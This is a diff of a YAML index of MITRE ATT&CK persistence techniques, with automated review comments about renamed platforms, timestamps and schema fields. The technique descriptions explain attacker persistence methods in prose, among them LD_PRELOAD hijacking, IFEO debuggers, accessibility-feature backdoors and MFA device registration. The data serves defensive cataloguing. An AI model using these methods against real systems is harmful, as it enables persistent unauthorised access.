AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
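Review bot: the Azure AD to Entra ID wording change correctly stops short of the process name `AzureADConnectAuthenticationAgentService` and of the citation keys `Azure AD Hybrid Identity` and `Azure AD Connect for Read Teamers`, all of which stay as-is; keep it that way if this is ever done by search-and-replace, because the service name is the real Windows service name and each `(Citation: ...)` key has to match a `source_name` in `external_references` exactly, including the `Read` spelling, or the reference will fail to resolve when rendered.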
@@ -30751,9 +31175,9 @@ persistence:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -30762,21 +31186,22 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
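Review bot: the platform list for T1556.007 drops `Azure AD`, `Google Workspace` and `Office 365` and adds `Office Suite` and `Identity Provider` alongside `x_mitre_version: '1.1'`, so any consumer that filters or builds indexes on the old platform names will silently match nothing for this technique after the change. Please confirm that whatever generates per-platform outputs from this file has been updated for the new names before merging, and that the loss of the Google Workspace and Office 365 labels here is intended rather than a casualty of the source switch. The remaining lines in the hunk (`x_mitre_attack_spec_version`, `x_mitre_contributors`, `x_mitre_domains`, `x_mitre_modified_by_ref`) are only moved, not changed.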
@@ -30816,13 +31241,10 @@ persistence:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.004:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:48.453Z'
name: 'Create or Modify System Process: Launch Daemon'
description: |-
Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/
and /Library/LaunchDaemons/
. Required Launch Daemons parameters include a Label
to identify the task, Program
to provide a path to the executable, and RunAtLoad
to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
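Review bot: the `modified` timestamp for T1543.004 moves backwards, from `2023-05-09T14:00:00.188Z` to `2023-03-30T21:01:48.453Z`, and the same regression recurs below for T1546.005, T1574.006, T1546.012, T1574.005, T1546.008, T1542.002, T1546.009, T1547.015 and T1205.001. Every removed value ends in `.188Z` and several sit at exactly `14:00:00`, which looks like a bulk rewrite by the previous data source rather than a real edit time, so the new values are probably the authoritative ones; please state that in the change description, and check that nothing downstream treats `modified` as monotonically increasing (a cache keyed on "newer than last seen" would consider these objects unchanged). This hunk also deletes `spec_version: '2.1'`, which the rest of the diff removes from every object; if anything validates these objects as STIX 2.1 bundles it will need the field re-added at export time.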
@@ -30899,12 +31321,11 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1543.004
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -30923,6 +31344,7 @@ persistence:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -30930,7 +31352,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -30950,29 +31371,31 @@ persistence:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1505.003:
@@ -31049,12 +31472,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1505.003
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -31069,6 +31491,7 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -31077,18 +31500,18 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -31120,9 +31543,6 @@ persistence:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1547.003:
@@ -31194,7 +31614,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.003
atomic_tests: []
T1546.005:
@@ -31221,7 +31640,7 @@ persistence:
url: https://bash.cyberciti.biz/guide/Trap_statement
description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T16:43:02.273Z'
name: 'Event Triggered Execution: Trap'
description: |-
Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap
command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c
and ctrl+d
.
@@ -31247,13 +31666,11 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.005
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
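Review bot: T1546.005 loses `x_mitre_attack_spec_version: 2.1.0` here with no replacement line, and the same happens to T1546.012, T1574.005, T1542.002, T1546.009, T1547.015 and T1205.001 later in the diff, while other objects in the same change (T1556.007, T1574.008, T1078.001, T1137.001) are bumped to `3.2.0`. The result is a file where some technique objects carry the field and others do not. Please confirm whether the source objects for these older techniques genuinely lack `x_mitre_attack_spec_version` or whether the generator is dropping it, and if consumers key off the field, consider defaulting it rather than emitting a mixed schema.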
@@ -31374,7 +31791,6 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1136.001:
@@ -31446,7 +31862,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.001
atomic_tests: []
T1547.004:
@@ -31516,7 +31931,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.004
atomic_tests: []
T1098.004:
@@ -31626,7 +32040,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.004
atomic_tests: []
T1546.012:
@@ -31680,7 +32093,7 @@ persistence:
description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
18, 2017.
source_name: Symantec Ushedix June 2008
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.112Z'
name: 'Event Triggered Execution: Image File Execution Options Injection'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe
). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -31713,8 +32126,6 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.012
atomic_tests: []
T1574.005:
@@ -31745,7 +32156,7 @@ persistence:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -31780,12 +32191,10 @@ persistence:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:18.602Z'
name: 'Event Triggered Execution: Accessibility Features'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -31862,7 +32271,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.008
atomic_tests: []
T1136.002:
@@ -31916,7 +32324,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.002
atomic_tests: []
T1542.002:
@@ -31948,7 +32355,7 @@ persistence:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-01T20:43:55.632Z'
name: Component Firmware
description: |-
Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -31978,55 +32385,10 @@ persistence:
- SYSTEM
x_mitre_system_requirements:
- Ability to update component device firmware from the host operating system.
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1137.001:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
- type: attack-pattern
- created: '2019-11-07T20:29:17.788Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.001
- url: https://attack.mitre.org/techniques/T1137/001
- - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
- description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
- Retrieved July 3, 2017.
- source_name: Microsoft Change Normal Template
- - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
- description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
- Retrieved July 3, 2017.
- source_name: MSDN VBA in Office
- - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
- description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
- Retrieved July 3, 2017.
- source_name: enigma0x3 normal.dotm
- - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
- description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
- Retrieved July 3, 2017.
- source_name: Hexacorn Office Template Macros
- - source_name: GlobalDotName Jun 2019
- url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
- description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
- - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
- - source_name: CrowdStrike Outlook Forms
- url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
- description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
- Movement and Persistence. Retrieved February 5, 2019.
- - source_name: Outlook Today Home Page
- url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
- description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
- Retrieved February 5, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:01:35.918Z'
name: 'Office Application Startup: Office Template Macros.'
description: "Adversaries may abuse Microsoft Office templates to obtain persistence
on a compromised system. Microsoft Office contains templates that are part
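Review bot: almost the whole of the T1137.001 object (`x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and the full `external_references` list) is deleted here and re-emitted further down in a different key order, so a one-line `modified` bump for this technique produces roughly fifty lines of diff and the actual content changes are hard to spot. Consider having the generator emit keys in a stable order (for example sorted, or the upstream STIX order) and keeping `external_references` in source order, so that future syncs produce minimal diffs that a reviewer can actually check. The first two removed lines in this hunk (`spec_version`, `x_mitre_attack_spec_version: 2.1.0` on T1542.002) are part of the pattern already noted for the older objects.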
@@ -32057,6 +32419,7 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: 'Many Office-related persistence mechanisms require changes
to the Registry and for binaries, files, or scripts to be written to disk
or existing files modified to include malicious scripts. Collect events related
@@ -32066,9 +32429,13 @@ persistence:
also be investigated since the base templates should likely not contain VBA
macros. Changes to the Office macro security settings should also be investigated.(Citation:
GlobalDotName Jun 2019)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
@@ -32076,11 +32443,47 @@ persistence:
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
+ created: '2019-11-07T20:29:17.788Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/001
+ external_id: T1137.001
+ - source_name: MSDN VBA in Office
+ description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
+ Retrieved July 3, 2017.
+ url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
+ - source_name: Hexacorn Office Template Macros
+ description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
+ Retrieved July 3, 2017.
+ url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
+ - source_name: Microsoft Change Normal Template
+ description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
+ Retrieved July 3, 2017.
+ url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
+ - source_name: enigma0x3 normal.dotm
+ description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
+ Retrieved July 3, 2017.
+ url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
+ - source_name: CrowdStrike Outlook Forms
+ description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
+ Movement and Persistence. Retrieved February 5, 2019.
+ url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+ - source_name: GlobalDotName Jun 2019
+ description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+ - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+ url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+ - source_name: Outlook Today Home Page
+ description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+ Retrieved February 5, 2019.
+ url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.001
atomic_tests: []
T1546.009:
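Review bot: the only substantive loss in this otherwise reordering hunk is `x_mitre_permissions_required` with `User` and `Administrator` being removed from T1137.001 with no replacement, while the same field is kept on T1546.005, T1546.012, T1547.015 and T1205.001 elsewhere in the diff. That inconsistency suggests the newer upstream object (modified `2024-10-15`) dropped the field while the older objects still carry it, rather than a deliberate strip by the generator; please confirm which it is and check whether anything that builds the atomic indexes from this file reads `x_mitre_permissions_required`. The re-emitted `external_references` entries are identical in content to the removed ones, only reordered by `source_name`.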
@@ -32112,7 +32515,7 @@ persistence:
description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
Retrieved December 18, 2017.
source_name: Sysinternals AppCertDlls Oct 2007
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.052Z'
name: 'Event Triggered Execution: AppCert DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -32160,13 +32563,11 @@ persistence:
x_mitre_effective_permissions:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.009
atomic_tests: []
T1098.005:
technique:
- modified: '2023-10-03T17:38:39.065Z'
+ modified: '2024-09-25T20:39:53.597Z'
name: Device Registration
description: "Adversaries may register a device to an adversary-controlled account.
Devices may be registered in a multifactor authentication (MFA) system, which
@@ -32179,16 +32580,16 @@ persistence:
FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
only a username and password to enroll the account's first device or to enroll
a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
- an adversary with existing access to a network may register a device to Azure
- AD and/or its device management system, Microsoft Intune, in order to access
+ an adversary with existing access to a network may register a device to Entra
+ ID and/or its device management system, Microsoft Intune, in order to access
sensitive data or resources while bypassing conditional access policies.(Citation:
AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
- Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+ Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
campaigns via intra-organizational emails, which are less likely to be treated
as suspicious by the email client.(Citation: Microsoft - Device Registration)
Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
- on an Azure AD tenant by registering a large number of devices.(Citation:
+ on an Entra ID tenant by registering a large number of devices.(Citation:
AADInternals - BPRT)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -32200,16 +32601,16 @@ persistence:
- Mike Moran
- Joe Gumke, U.S. Bank
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- Windows
- - SaaS
- x_mitre_version: '1.2'
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Active Directory: Active Directory Object Creation'
@@ -32264,7 +32665,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1542:
technique:
@@ -32325,7 +32725,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.015:
technique:
@@ -32401,7 +32800,7 @@ persistence:
url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
5, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T16:36:37.042Z'
name: 'Boot or Logon Autostart Execution: Login Items'
description: |-
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled
.
@@ -32429,8 +32828,6 @@ persistence:
- 'File: File Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.015
atomic_tests: []
T1205.001:
@@ -32456,7 +32853,7 @@ persistence:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -32481,23 +32878,21 @@ persistence:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1098.001:
technique:
- modified: '2024-02-28T14:35:00.862Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Credentials'
description: "Adversaries may add adversary-controlled credentials to a cloud
account to maintain persistent access to victim accounts and instances within
the environment.\n\nFor example, adversaries may add credentials for Service
Principals and Applications in addition to existing legitimate credentials
- in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
- Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
- both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
- With sufficient permissions, there are a variety of ways to add credentials
- including the Azure Portal, Azure command line interface, and Azure or Az
- PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+ in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+ Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+ include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+ Guidance) With sufficient permissions, there are a variety of ways to add
+ credentials including the Azure Portal, Azure command line interface, and
+ Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
infrastructure-as-a-service (IaaS) environments, after gaining access through
[Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
may generate or import their own SSH keys using either the CreateKeyPair
